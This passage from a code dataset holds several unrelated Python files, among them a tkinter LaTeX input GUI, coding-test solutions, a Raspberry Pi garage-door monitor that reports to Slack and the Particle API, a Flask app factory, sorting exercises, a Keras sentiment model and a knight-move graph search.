Button(root,text = 'μ',command = Mu)\nbtn_alpha.place(x = 0+wid*8,y = 350,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ξ',command = Xi)\nbtn_alpha.place(x = 0+wid*0,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'π',command = Pi)\nbtn_alpha.place(x = 0+wid*1,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ρ',command = Rho)\nbtn_alpha.place(x = 0+wid*2,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'σ',command = Sigma)\nbtn_alpha.place(x = 0+wid*3,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'τ',command = Tau)\nbtn_alpha.place(x = 0+wid*4,y = 350+hei*1,width = wid,height = 
hei)\nbtn_alpha = Button(root,text = 'φ',command = Phi)\nbtn_alpha.place(x = 0+wid*5,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'χ',command = Chi)\nbtn_alpha.place(x = 0+wid*6,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ψ',command = Psi)\nbtn_alpha.place(x = 0+wid*7,y = 350+hei*1,width = wid,height = hei)\nbtn_alpha = Button(root,text = 'ω',command = Omega)\nbtn_alpha.place(x = 0+wid*8,y = 350+hei*1,width = wid,height = hei)\n\n\n# function insertion helpers; raw strings keep backslash sequences\n# such as \frac intact instead of being read as string escapes\ndef xa():\n entry.insert('insert', '^{U}')\ndef xab():\n entry.insert('insert', '_{L}^{U}')\ndef ppx():\n entry.insert('insert', r' \frac{\partial ?}{\partial x}')\ndef p2px2():\n entry.insert('insert', r' \frac{\partial^2 ?}{\partial x^2}')\ndef ddx():\n entry.insert('insert', r' \frac{\mathrm{d} ?}{\mathrm{d} x}')\ndef inte():\n entry.insert('insert', r'\int ?')\ndef inteab():\n entry.insert('insert', r'\int_{L}^{U}')\n\nbtn_xa = Button(root,text = 'x^(a)',command = xa)\nbtn_xa.place(x = 0+wid*10,y = 350,width = wid,height = hei)\nbtn_xab = Button(root,text = 'x_(a)^(b)',command = xab)\nbtn_xab.place(x = 0+wid*11,y = 350,width = wid*2,height = hei)\nbtn_ppx = Button(root,text = 'p/px',command = ppx)\nbtn_ppx.place(x = 0+wid*13,y = 350,width = wid*2,height = hei)\nbtn_ddx = Button(root,text = 'd/dx',command = ddx)\nbtn_ddx.place(x = 0+wid*15,y = 350,width = wid,height = hei)\nbtn_inte = Button(root,text = 'integral',command = inte)\nbtn_inte.place(x = 0+wid*16,y = 350,width = wid*2,height = hei)\nbtn_inteab = Button(root,text = 'integralab',command = inteab)\nbtn_inteab.place(x = 0+wid*10,y = 350+hei,width = wid*2,height = hei)\n\n\n# Re-render the entered expression when Enter is pressed.\nroot.bind('<Return>', graph)\nroot.mainloop()","sub_path":"latexmath/latex_mat_v2.py","file_name":"latex_mat_v2.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"456568898","text":"'''\nN : 자연수\nK : 나눌 수 있는 수\n1. N에서 1을 뺀다.\n2. N을 K로 나눈다.\n\n이 두 가지 연산을 골라서 최소한만 연산해서 1로 만드는 것이 과제\n'''\n\nM, K = map(int, input().split())\nfirst = M % K\nsecond = (M - first) // K\n\nresult = first + second\nprint(result)\n","sub_path":"이것이 취업을 위한 코딩테스트다 with 파이썬/1. 그리디 알고리즘/[099p - 2회독]1이 될 때까지 - 그리디.py","file_name":"[099p - 2회독]1이 될 때까지 - 그리디.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"618200473","text":"from tornado.web import Application\nfrom tornado.options import options, define\nfrom kazoo.client import KazooClient\n\ndefine('port', default=8080, help=\"listen port.\")\ndefine('bind', default='0.0.0.0', help=\"bind address\")\ndefine('zkroot', default='/cmdb/lock', help=\"zookeeper node of cmdb root.\")\ndefine('zkHosts', default='127.0.0.1:2181', help='zookeeper server.')\n\n\ndef make_app(router, **settings):\n app = Application(router, settings)\n zk = KazooClient(options.zkHosts)\n setattr(app, 'zk', zk)\n return app\n","sub_path":"cmdb/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"443780390","text":"from functools import reduce\nN = input() #join함수 써보기, 30은 3의 배수에 마지막자리의 숫자가 0이면 됨, 3의 배수는 자리수 �� 더해서 3의 배수, 3의 배수는 자릿수 다 합쳐서 3의 배수면 됨\nL = list(str(N)) # 999을 입력 받으면 ['9','9','9']로 쪼개줌\na = 10**(len(L)-1)\nL = sorted(L,reverse=True) #가장 큰 수니까 내림차순으로 정렬해줌\ns = reduce(lambda x,y : int(x)+int(y),L) #리스트 안의 요소를 모두 더해서 값 한개로\n\nif L[-1] != \"0\" or s%3!=0 :\n print(-1)\nelse :\n print(int(\"\".join(L))) #리스트 안의 요소를 합치는 함수, 하고나서 형변환 해줌\n\n\n \n\n\n\n\n# N = input() #join 함수 안쓰고 int로 해결함\n# L = list(map(int,str(N)))\n# l = len(L)\n# a = 10**(l-1)\n# L = sorted(L,reverse=True)\n# if L[-1] != 0 :\n# print(-1)\n# else :\n# result = 0\n# for i in range(l):\n# result += L[i]*a\n# a//=10\n# print(result)\n \n\n\n\n\n\n\n# import itertools #메모리초과 뜸\n# N = input()\n# L = list(map(int,str(N)))\n# a = 10**(len(L)-1)\n# P = list(itertools.permutations(L))\n# result = -1\n\n# for i in range(len(P)):\n# tmp = 0\n# b = a\n# for j in range(len(P[i])):\n# tmp += P[i][j]*(b)\n# b//=10\n# if tmp%30 == 0 :\n# result = max(result,tmp)\n# print(result)","sub_path":"2020_spring/2020_04_01/10610_JH.py","file_name":"10610_JH.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"125301942","text":"#!/usr/bin/python\n\n#\n# This Python script is used to monitor the status of a garage door and\n# report open and close events to a smartphone via slack IOT events.\n#\n# A Raspberry Pi model 3 or 3+ and a HC-SR05 ultrasonic distance sensor and a\n# handful of parts are required.\n#\n# Enhanced to send HTTP POST requests with the current garage door status to a\n# Particle Photon. The Photon will allow a person (via an app) to close the\n# garage door remotely. The Photon requires the current status of the garage\n# door so it can prevent a person from opening the door.\n\n# Import required standard libraries.\nfrom __future__ import print_function\nimport argparse\nimport math\nimport os\nimport requests\nimport RPi.GPIO as GPIO\nimport time\n\n# Import required libraries.\nimport gd_closer_credentials\nimport journal\nimport sensor\nimport slack\n\n# Define the Raspberry Pi GPIO pins for the sensor and LED.\nGPIO_TRIGGER = 25\nGPIO_ECHO = 24\nGPIO_STATUS_LED = 21\n\n# Define the loggers and log files that will be used to\n# record activitiesand when the program has started. A separate\n# log is usedto make it easy to see how often the program is\n# restarteddue to fatal errors.\nGDOOR_ACTIVITY_LOGGER = \"activity\"\nGDOOR_STARTUP_LOGGER = \"startup\"\nGDOOR_ACTIVITY_LOG_FILE = \"gdoor-activity.log\"\nGDOOR_STARTUP_LOG_FILE = \"gdoor-startup.log\"\n\n# Define the door states.\nDOOR_OPEN = \"open\"\nDOOR_CLOSED = \"closed\"\n\n# Define the messages that will be sent via Slack.\nDOOR_OPENED_MESSAGE = \"Garage door just opened!\"\nDOOR_CLOSED_MESSAGE = \"Garage door just closed!\"\nDOOR_OPEN_WARNING_MESSAGE = \"Garage door has been open more than {} minutes\"\n\n# If SLACK_DEBUG is set to True messages will not be sent to slack.\nSLACK_DEBUG = False\n\n# Slack message successfully sent\nSLACK_SUCCESS = 200\n\n# Garage door closing device status update commands\nGD_CLOSER_CLOSED = \"setgdclosed\"\nGD_CLOSER_OPEN = \"setgdopen\"\n\n\ndef post_gdoor_status(status):\n \"\"\"\n Send a HTTPS POST to a Particle Photon microcontroller attached to the Particle Cloud.\n The Photon keeps track of the garage door status and via an app will allow a person to\n close the garage door. The Photon will only allow the garage door to be closed (not opened)\n and to enforce that requires up-to-date status of whether the garage door is currently open\n or closed. A string with the status of the POST request is returned from this function.\n \"\"\"\n\n GD_CLOSER_SOURCE = \"gdmonitor\" # used to indicate where the POST command came from\n\n # Define the parameters that will be sent in the POST request\n headers = { 'Authorization' : 'Bearer ' + gd_closer_credentials.GD_CLOSER_BEARER }\n data = { 'arg' : GD_CLOSER_SOURCE }\n url = 'https://api.particle.io/v1/devices/' + gd_closer_credentials.GD_CLOSER_DEVICE + '/' + status\n\n # Attempt to send the POST request. 
Failure will not stop the monitor program.\n try:\n response = requests.post(url, headers=headers, data=data)\n return \"POST to gdcloser with status={} was successful\".format(status)\n except requests.exceptions.RequestException as err:\n return \"POST to gdcloser Request failed with error: {}\".format(err)\n except Exception as err:\n return \"POST to gdcloser failed with an unexpected error: {}\".format(err)\n \n\ndef get_average_measurement(distance_sensor,\n num_measurements,\n delay,\n door_log,\n ):\n \"\"\"\n Collect a set of measurements and return the average measurement.\n \"\"\"\n\n measurement = 0.0\n for n in range(num_measurements):\n\n distance_measurement, echo_counter = distance_sensor.get_measurement()\n measurement += distance_measurement\n\n logmsg = \"Measurement: {} Sensor measurement: {} Echo counter: {}\".format(n, distance_measurement, echo_counter)\n door_log.debug(logmsg)\n\n time.sleep(delay)\n\n average_measurement = measurement / num_measurements\n return average_measurement\n\n\ndef monitor_door(trigger_pin,\n echo_pin,\n led_status_pin,\n measurements,\n time_between_indiv_measurements,\n time_between_avg_measurements,\n open_threshold,\n warning_threshold,\n door_log,\n ):\n\n \"\"\"\n Use the sensor to monitor the status of the door and\n send slack messages when the door state changes. Also\n report via slack if the door is opened for a prolonged period of time.\n \"\"\"\n\n # Record the start of execution.\n door_log.information(\"Door Monitoring Started\")\n\n # Setup for sending slack messages\n slack_iot = slack.Iot(debug=SLACK_DEBUG)\n\n # Initialize the ultrasonic distance sensor.\n distance_sensor = sensor.DistanceSensor(trigger_pin,\n echo_pin,\n led_status_pin,\n 0.05,\n DOOR_OPEN,\n DOOR_CLOSED,\n )\n\n # Keep track of the number of times measurements are taken\n iteration = -1\n\n # First time through assume door is closed.\n door_previous_status = DOOR_CLOSED\n door_status = DOOR_CLOSED\n last_warning = 0\n\n while True:\n\n iteration += 1\n\n door_log.debug(\"------- Entering iteration {:,} -------\".format(iteration))\n door_log.information(\"Checking door status ({:,})\".format(iteration))\n\n # Take the specified number of measurements and calculate the average.\n\n elapsed = get_average_measurement(distance_sensor,\n measurements,\n time_between_indiv_measurements,\n door_log,\n )\n\n door_log.debug(\"{:,} Average measurement: {}\".format(iteration, elapsed))\n\n # Calculate the distance in centimeters\n distance = distance_sensor.calculate_distance(elapsed)\n\n door_log.debug(\"{:,} Distance: {:5.1f} cm\".format(iteration, distance))\n\n # Determine what the current state of the door is by\n # comparing the distance to the number of centimeters above which the\n # door is considered open\n\n if distance < open_threshold:\n door_status = DOOR_OPEN\n else:\n door_status = DOOR_CLOSED\n\n door_log.information(\"{:,} Door is currently {}\".format(iteration, door_status))\n\n # Check to see if the state of the door has changed.\n if door_status != door_previous_status:\n\n # The state of the door has changed.\n # Determine what happened.\n\n door_log.information(\"{:,} Door State Change: New Distance: {:5.1f}\".format(iteration, distance))\n\n if door_status == DOOR_OPEN:\n\n # Log that the door has opened; set the LED to\n # indicate that the door is open; send a message\n # via slack saying the door is open.\n\n door_previous_status = DOOR_OPEN\n door_log.information(DOOR_OPENED_MESSAGE)\n distance_sensor.set_door_status_led(DOOR_OPEN)\n # Don't 
send a slack message the first time through\n if iteration > 0:\n slack_iot.post_message(DOOR_OPENED_MESSAGE)\n if slack_iot.status_code != SLACK_SUCCESS:\n door_log.information(\"Unable to send slack garage door Opened notification\")\n\n # Record the time that the door was opened.\n opened_time = time.time()\n\n # Send HTTPS POST with current status to the garage door closer device.\n door_log.information(post_gdoor_status(GD_CLOSER_OPEN))\n\n else:\n # Log that the door has closed; set the LED to\n # indicate that the door is closed; send a message\n # via slack saying the door is closed.\n\n door_previous_status = DOOR_CLOSED\n door_log.information(DOOR_CLOSED_MESSAGE)\n distance_sensor.set_door_status_led(DOOR_CLOSED)\n \n # Don't send a slack message the first time through\n if iteration > 0:\n slack_iot.post_message(DOOR_CLOSED_MESSAGE)\n if slack_iot.status_code != SLACK_SUCCESS:\n door_log.information(\"Unable to send slack garage door Closed notification\")\n \n # Send HTTPS POST with current status to the garage door closer device.\n door_log.information(post_gdoor_status(GD_CLOSER_CLOSED))\n\n # If the door is closed, blink the LED briefly. This blinking\n # is like what happens on smoke detectors and is done to indicate\n # that the sensor and Raspberry Pi are alive and well.\n if door_status == DOOR_CLOSED:\n distance_sensor.blink_led()\n\n # If the door is open, calculate how long it's been open, and periodically\n # send slack messages warning that the door has been opened for a prolonged\n # period of time.\n\n if door_status == DOOR_OPEN:\n elapsed_open_time_mins = (time.time() - opened_time) / 60.0\n door_log.information(\"{:,} Open door elapsed time is {:06.2f} minutes\".format(iteration, elapsed_open_time_mins))\n elapsed_open_time_mins = int(elapsed_open_time_mins)\n #### print(\"elapsed_open_time_mins {} last_warning {}\".format(elapsed_open_time_mins, last_warning))\n\n # Send the slack message if the door has been opened for a multiple of\n # 'warning_threshold' minutes.\n\n if ((elapsed_open_time_mins > 0 ) and\n (elapsed_open_time_mins % warning_threshold) == 0):\n #### print(\"elapsed_open_time {} warning_threshold {}\".format(elapsed_open_time_mins, warning_threshold))\n\n # Make sure only one message is sent per 'warning_threshold' multiple.\n if elapsed_open_time_mins != last_warning:\n open_warning_message = DOOR_OPEN_WARNING_MESSAGE.format(elapsed_open_time_mins)\n door_log.warning(open_warning_message)\n slack_iot.post_message(open_warning_message)\n last_warning = elapsed_open_time_mins\n\n # Sleep until time to take the next set of measurements.\n door_log.debug(\"{:,} Sleeping for {} seconds\".format(iteration, time_between_avg_measurements))\n time.sleep(time_between_avg_measurements)\n door_log.debug(\"{:,} Awoken from sleep\".format(iteration))\n\n\n#\n# This is the main processing where the command line arguments are\n# parsed and the monitoring function is called.\n#\n\ndef main():\n\n program_name = os.path.basename(__file__)\n door_log = journal.Journal(GDOOR_ACTIVITY_LOGGER,\n GDOOR_ACTIVITY_LOG_FILE,\n program_name)\n\n startup_log = journal.Journal(GDOOR_STARTUP_LOGGER,\n GDOOR_STARTUP_LOG_FILE,\n program_name)\n\n startup_log.information(\"Garage door monitor started.\")\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\",\n \"--checkstatus\",\n type=float,\n default=1.0,\n help=\"delay in minutes between checking door status\",\n )\n parser.add_argument(\"-i\",\n \"--individual\",\n type=float,\n default=0.5,\n help=\"delay in 
seconds between taking individual measurements\",\n )\n parser.add_argument(\"-m\",\n \"--measurements\",\n type=int,\n default=3,\n help=\"number of measurements for averaging\",\n )\n parser.add_argument(\"-o\",\n \"--open\",\n type=int,\n default=50,\n help=\"number of cm above the door is considered open\",\n )\n parser.add_argument(\"-w\",\n \"--warning\",\n type=int,\n default=30,\n help=\"display warnings when the door is open more than this many minutes\",\n )\n parser.add_argument(\"-d\",\n \"--debug\",\n action='store_true',\n help=\"print and log debugging messages\",\n )\n\n args = parser.parse_args()\n\n msg = \"Each average will use {} measurements.\".format(args.measurements)\n door_log.information(msg)\n\n msg = \"There will be {} seconds delay between individual measurements.\".format(args.individual)\n door_log.information(msg)\n\n msg = \"There will be {} minutes ({} seconds) delay between checking the door's status.\".format(args.checkstatus, args.checkstatus*60)\n door_log.information(msg)\n\n msg = \"Door is considered open if sensor reading is less than {}\".format(args.open)\n door_log.information(msg)\n\n msg = \"Warnings will be sent every {} minutes while the door is open\".format(args.warning)\n door_log.information(msg)\n\n # Set whether debug messages are printed and logged based on \n # what was specified on the command.\n door_log.log_debug = args.debug\n\n # Convert the time between taking averaged measurements from\n # minutes to seconds.\n checkstatus = 60 * args.checkstatus\n\n monitor_door(GPIO_TRIGGER,\n GPIO_ECHO,\n GPIO_STATUS_LED,\n args.measurements,\n args.individual,\n checkstatus,\n args.open,\n args.warning,\n door_log,\n )\n\n door_log.debug(\"Exiting...\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"garage-monitor.py","file_name":"garage-monitor.py","file_ext":"py","file_size_in_byte":14153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"120491191","text":"import json\nfrom logging.config import dictConfig as loadLogginConfig\nfrom pydantic import ValidationError\nfrom email_validator import EmailNotValidError\nfrom flask import Flask\nfrom flask_cors import CORS\n#\nfrom social_network.errors import ApplicationError\nfrom social_network.database import Database\nfrom social_network.settings import Config\n\n\n__all__ = [\"create_application\"]\n\n\ndb = Database()\n\n\ndef create_application():\n app = Flask(\"social_network\")\n app.config.from_object(Config)\n\n CORS(app)\n db.init_app(app)\n\n setup_logging(app)\n register_error_handlers(app)\n register_blueprints(app)\n\n return app\n\n\ndef setup_logging(app):\n with open(app.config[\"LOGGING_SETTINGS\"], \"r\") as f:\n loadLogginConfig(json.load(f))\n\n\ndef register_blueprints(app):\n from social_network.blueprints import auth_blueprint\n from social_network.blueprints import posts_blueprint\n from social_network.blueprints import users_blueprint\n from social_network.blueprints import analytics_blueprint\n\n app.register_blueprint(auth_blueprint)\n app.register_blueprint(posts_blueprint)\n app.register_blueprint(users_blueprint)\n app.register_blueprint(analytics_blueprint)\n\n\ndef register_error_handlers(app):\n\n def _handle_error(error):\n reason_tmp = getattr(error, \"description\", \"Internal error\")\n code_tmp = getattr(error, \"code\", 500)\n details_tmp = getattr(error, \"details\", [])\n\n reason = reason_tmp if isinstance(reason_tmp, str) else \"Internal error\"\n code = int(code_tmp) if isinstance(code_tmp, int) else 500\n details = details_tmp if isinstance(details_tmp, (list, tuple)) else []\n\n return {\n \"status\": \"error\",\n \"reason\": reason,\n \"details\": details\n }, code\n\n def default_handler(error):\n app.logger.exception(f\"Error occurred:\\n{str(error)}\")\n return _handle_error(error)\n\n\n def application_error_handler(error):\n app.logger.error(f\"Error occurred:\\n{str(error)}\")\n return _handle_error(error)\n \n def validation_error_handler(error):\n app.logger.info(f\"Invalid input:\\n{str(error)}\")\n return {\n \"status\": \"error\",\n \"reason\": \"Incorrec input\",\n \"details\": error.errors()\n }, 400\n\n def unvalid_email_error_handler(error):\n app.logger.info(f\"Invalid Email:\\n{str(error)}\")\n return {\n \"status\": \"error\",\n \"reason\": \"Email is not valid\",\n \"details\": []\n }, 400\n \n app.register_error_handler(Exception, default_handler)\n app.register_error_handler(ValidationError, validation_error_handler)\n app.register_error_handler(ApplicationError, application_error_handler)\n app.register_error_handler(EmailNotValidError, unvalid_email_error_handler)\n","sub_path":"src/social_network/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"446459039","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 13 11:07:36 2018\n\n@author: ENFIUEMS02\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport networkx as nx\n\n\n#CRIANDO UM GRAFO DO TIPO GRID 2D\n\nN = 2\n\nG=nx.grid_2d_graph(N,N) #4x4 grid\n\nfor i in range(N):\n for j in range(N):\n G.nodes[(i,j)]['position']=[i,j]\n\npos=nx.get_node_attributes(G,'position')\n\nnx.draw(G, pos, with_labels=True)\n#plt.gca().invert_xaxis\n#plt.gca().invert_yaxis\nplt.axis('on')\nplt.show()\n\nprint(nx.info(G))\n\nprint(\"Vértices:\")\n\nfor i in G.nodes():\n print(i, \"position= \", G.node(data='position')[i])\n","sub_path":"paper_netx_texture_v4.py","file_name":"paper_netx_texture_v4.py","file_ext":"py","file_size_in_byte":593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"620911124","text":"def insertionsort(a):\r\n for i in range(len(a)):\r\n temp = a[i]\r\n k = i\r\n while k > 0 and temp < a[k - 1]:\r\n a[k] = a[k - 1]\r\n k -= 1\r\n a[k] = temp\r\n\r\ndef bucketsort(a):\r\n b=[]\r\n n=len(a)\r\n for i in range(1,11):\r\n l=[]\r\n b.append(l)\r\n x=max(a)\r\n d=0.1\r\n\r\n while x>0:\r\n x=int(x/10)\r\n d=d*10\r\n \r\n for i in range(n):\r\n j=int(a[i]/d)\r\n print(j)\r\n b[j].append(a[i])\r\n\r\n for i in range(1,11):\r\n try:\r\n insertionsort(b[i])\r\n except:\r\n pass\r\n l=[] \r\n for i in b :\r\n for j in i :\r\n l.append(j)\r\n print(l)\r\n \r\ns = input(\"Enter the numbers\")\r\na=list(map(int, s.split()))\r\nbucketsort(a)\r\n","sub_path":"Sorting/bucketsort.py","file_name":"bucketsort.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"523444740","text":"nn = input().split()\nn = int(nn[0])\nl = int(nn[1])\nr = int(nn[2])\n#s = [n]\n'''\nwhile True:\n\tla = True\n\tfor i in range(len(s)):\n\n\t\tif s[i] > 1:\n\t\t\ts = s[:i]+[int(s[i]/2),s[i]%2, int(s[i]/2)]+s[i+1:]\n\t\t\tla = False\n\tif la:\n\t\tbreak\n\ndef f(w):\n\tif w == 1:\n\t\treturn [1]\n\tif w == 0:\n\t\treturn[0]\n\ta = f(int(w/2))\n\treturn a + [w%2] + a\n'''\nlis = []\nwhile n > 1:\n\tif n%2:\n\t\tlis.append(1)\n\telse:\n\t\tlis.append(0)\n\tn = int(n/2)\n\tprint(n)\nlis = lis[::-1]\nllis = len(lis)\ncount = 0\nprint(lis)\nprint(llis)\nfor i in range(l,r+1):\n\tif i % 2:\n\t\t#print(i)\n\t\tcount += 1\n\telse:\n\t\tfor j in range(llis):\n\t\t\tif i - 2**(j +1) <0:\n\t\t\t\t#print(i - 2**(j +1))\n\t\t\t\tbreak\n\t\t\tif (i-2**(j +1))%(2**(j+2)) == 0:\n\t\t\t\t#print(2**(j +1))\n\t\t\t\tcount += lis[j]\n\n\nprint(count)","sub_path":"Codeforces/399d2B.py","file_name":"399d2B.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"389514879","text":"\"\"\"\r\nDesafio089 - Crie um programa que leia nome e duas notas de varios alunos\r\ne guarde tudo em uma lista composta. No final mostre um boletim contendo a media\r\nde cada um e permita que o usuario possa mostrar as notas de cada aluno individualmente\r\n\"\"\"\r\nalunos = []\r\nwhile True:\r\n nome = input('Nome: ')\r\n n1 = float(input('Nota 1: '))\r\n n2 = float(input('Nota 2: '))\r\n media = (n1 + n2) / 2 \r\n alunos.append( [nome, [n1, n2], media] )\r\n sair = input('Deseja sair? [S/N] ')\r\n if sair in 'sS':\r\n break\r\n\r\nprint('-='*30)\r\n\r\nprint(f'{\"Nº \":<2}{\"NOME\":<10}{\"MÉDIA\":>8}')\r\nprint('-'*30)\r\n\r\nfor i,a in enumerate(alunos):\r\n\tprint('{:<4}{:<10}{:>8.1f}'.format(i,a[0],a[2]))\r\n\r\nprint('-'*30)\r\nwhile True:\r\n try:\r\n op = int(input('Mostrar notas de qual aluno acima?\\nDigite o número ou 999 para sair: '))\r\n if op == 999:\r\n print('Saindo...')\r\n break\r\n elif op <= len(alunos):\r\n print('-'*30)\r\n print('Notas de {} são {}'.format(alunos[op][0], alunos[op][1]))\r\n print('-'*30)\r\n except IndexError:\r\n print('Não há nenhum aluno com este número!')\r\n print('-'*30)","sub_path":"Desafio089.py","file_name":"Desafio089.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"488430098","text":"#!/usr/bin/python3.4\n\nimport pygame\nfrom pygame.locals import *\n\npygame.init()\n\n#Ouverture de la fenêtre Pygame\nfenetre = pygame.display.set_mode((640, 480))\n\n#Chargement et collage du fond\nfond = pygame.image.load(\"background.jpg\").convert()\nfenetre.blit(fond, (0,0))\n\n#Chargement et collage du personnage\nperso = pygame.image.load(\"perso.png\").convert_alpha()\nposition_perso = perso.get_rect()\nfenetre.blit(perso, (200,300))\n\n#Rafraîchissement de l'écran\npygame.display.flip()\n\n#Variable qui continue la boucle si = 1, stoppe si = 0\ncontinuer = 1\n\n\npygame.key.set_repeat(400, 30)\n#Boucle infinie\nwhile continuer:\n for event in pygame.event.get(): #On parcours la liste de tous les événements reçus\n if event.type == QUIT: #Si un de ces événements est de type QUIT\n continuer = 0 #On arrête la boucle\n continuer = 0\n if event.type == KEYDOWN:\n if event.key == K_DOWN: #Si \"flèche bas\"\n #On descend le perso\n position_perso = position_perso.move(0,3)\n \n #Re-collage\n fenetre.blit(fond, (0,0)) \n fenetre.blit(perso, position_perso)\n #Rafraichissement\n pygame.display.flip()\n","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"612369520","text":"import numpy as np\n\nfrom keras.preprocessing import sequence\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation\nfrom keras.layers import Embedding\nfrom keras.layers import LSTM\nfrom keras.layers import Conv1D, MaxPooling1D\nfrom keras_preprocessing.text import Tokenizer\n\nfrom datasets import sentiment_140\nfrom utils.data_utils import export\nfrom w2v import google_news_vectors_negative300\n\n# Embedding\nmaxlen = 100\nmax_features = 20000\n\n# Convolution\nkernel_size = 5\nfilters = 64\npool_size = 4\n\n# LSTM\nlstm_output_size = 70\n\n# Training\nbatch_size = 2048\nepochs = 7\n\nprint('Loading data...')\n(x_train, y_train), (x_val, y_val), (x_test, y_test) = sentiment_140.load_data()\n\nprint('Fitting tokenizer...')\ntokenizer = Tokenizer()\ntokenizer.fit_on_texts(np.concatenate((x_train, x_val, x_test)))\n\nprint('Convert text to sequences')\nx_train = tokenizer.texts_to_sequences(x_train)\nx_val = tokenizer.texts_to_sequences(x_val)\nx_test = tokenizer.texts_to_sequences(x_test)\n\nprint(len(x_train), 'train sequences')\nprint(len(x_val), 'validation sequences')\nprint(len(x_test), 'test sequences')\n\nprint('Pad sequences (samples x time)')\n\nx_train = sequence.pad_sequences(x_train, maxlen=maxlen)\nx_val = sequence.pad_sequences(x_val, maxlen=maxlen)\nx_test = sequence.pad_sequences(x_test, maxlen=maxlen)\n\nprint('x_train shape:', x_train.shape)\nprint('x_val shape:', x_val.shape)\nprint('x_test shape:', x_test.shape)\n\nprint('Loading w2v...')\nword2vec = google_news_vectors_negative300.load_w2v()\n\nprint('Preparing embedding matrix')\nword_index = tokenizer.word_index\nnb_words = len(word_index)+1\nprint(nb_words)\nembedding_matrix = np.zeros((nb_words, 300))\nfor word, i in word_index.items():\n if word in word2vec.vocab:\n embedding_matrix[i] = word2vec.word_vec(word)\nprint('Null word embeddings: %d' % np.sum(np.sum(embedding_matrix, axis=1) == 0))\n\nprint('Build model...')\nmodel = Sequential()\nmodel.add(Embedding(embedding_matrix.shape[0],\n embedding_matrix.shape[1],\n weights=[embedding_matrix],\n input_length=maxlen,\n trainable=False))\nmodel.add(Dropout(0.25))\nmodel.add(Conv1D(filters,\n kernel_size,\n padding='valid',\n activation='relu',\n strides=1))\nmodel.add(MaxPooling1D(pool_size=pool_size))\nmodel.add(LSTM(lstm_output_size))\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\n\nmodel.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\nmodel.summary()\n\nprint('Train...')\nhistory = model.fit(x_train, y_train,\n batch_size=batch_size,\n epochs=epochs,\n validation_data=(x_val, y_val))\nscore, acc = model.evaluate(x_test, y_test, batch_size=batch_size)\nprint('Test score:', score)\nprint('Test accuracy:', acc)\n\nexport(model, history, tokenizer, name=\"sentiment_140_cnn_lstm\", score=score, acc=acc)\n","sub_path":"models/cnn_lstm/sentiment_140_cnn_lstm.py","file_name":"sentiment_140_cnn_lstm.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"200062088","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\n\nbd_dictionary = {\n 1: 'a',\n 2: 'b',\n 3: 'c',\n 4: 'd',\n 5: 'e',\n 6: 'f',\n 7: 'g',\n 8: 'h'\n}\n\n\nused = set()\n\n\ndef get_pos(row, col):\n return bd_dictionary[row] + str(col)\n\n\ndef gen_Legal_Moves(x, y):\n newMoves = []\n moveOffsets = [(-1, 2), (1, 2), (2, 1), (2, -1), (1, -2),\n (-1, -2), (-2, -1), (-2, 1)]\n for i in moveOffsets:\n newX = x + i[0]\n newY = y + i[1]\n if legal_Coord(newX) and legal_Coord(newY):\n newMoves.append((newX, newY))\n return newMoves\n\n\ndef legal_Coord(x):\n if x >= 1 and x <= 8:\n return True\n else:\n return False\n\n\ndef create_Graph():\n horse_Graph = dict()\n for row in range(1, 9, 1):\n for col in range(1, 9, 1):\n node_Id = get_pos(row, col)\n new_Positions = gen_Legal_Moves(row, col)\n temp = []\n for e in new_Positions:\n n_id = get_pos(e[0], e[1])\n temp.append(n_id)\n horse_Graph.update({node_Id: temp})\n return horse_Graph\n\n\ndef DFS(graph, current, end, fr):\n used.add(current)\n previous[current] = fr\n for node in graph[current]:\n if node not in used:\n if node == end:\n previous[end] = current\n break\n DFS(graph, node, end, current)\n\nif __name__ == \"__main__\":\n global previous\n previous = dict()\n graph = create_Graph()\n with open('in.txt', 'r') as inp:\n data = inp.read().split('\\n')\n start = data[0]\n end = data[1]\n DFS(graph, start, end, 